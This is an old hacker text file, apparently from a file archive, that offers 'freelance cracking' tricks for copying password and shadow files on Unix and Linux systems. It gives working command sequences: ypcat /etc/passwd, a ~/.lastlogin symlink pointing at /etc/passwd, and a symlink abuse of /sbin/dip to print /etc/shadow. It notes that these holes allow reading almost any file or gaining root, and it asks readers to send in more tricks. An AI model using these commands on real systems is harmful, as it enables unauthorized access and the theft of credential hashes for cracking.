home *** CD-ROM | disk | FTP | other *** search
- This is by no means a complete or even good list of possible ways to get a copy of the shadow file, but it's some that work and
- are pretty handy to know if you do alot of freelance cracking.
-
- Unix including: SunOS, SCO, System V, and others of the like are sometimes vulnerable to ypcat. This is an old and
- well known trick but it works.. To use it simply type ypcat /etc/passwd with your capture option turned on, or use
-
- ypcat /etc/passwd > ~/passwd
-
- and download the passwd file from your home dir.
-
- Unix including: SCO, System V 3.2, ?, could be vulnerable to a hole using the .lastlogin file. In your home directory if a
- ls -al shows the .lastlogin to be owned by auth or root or anyone with better security then you it's good :)
- To exploit:
-
- rm -f ~/.lastlogin
- ln -s ~/.lastlogin /etc/passwd
-
- Now logout and then back in so you create the link.
-
- cat .lastlogin > passwd
- rm -f ~/.lastlogin
-
- This hole could have several other uses as well, the fact that it allows you read access to most any file on the system is a
- nice gift.
-
- Linux including: slackware, ?, not only can the dip hole be used to exploit root but it can also snag you the shadow file
- fairly easily. Why you wouldn't use it to get to root and then just edit/download it I have no clue but here it is anyways..
- To exploit:
-
- ln -s /etc/shadow /tmp/dummy.dip
- /sbin/dip -v /tmp/dummy.dip
-
- Assuming dip is vulnerable this should type the shadow file for you and of course it's not limited to just reading the
- shadow file..
-
- If you know of other tricks, especially some that defeat linux shadow, and wish to share them mail Cassidy..
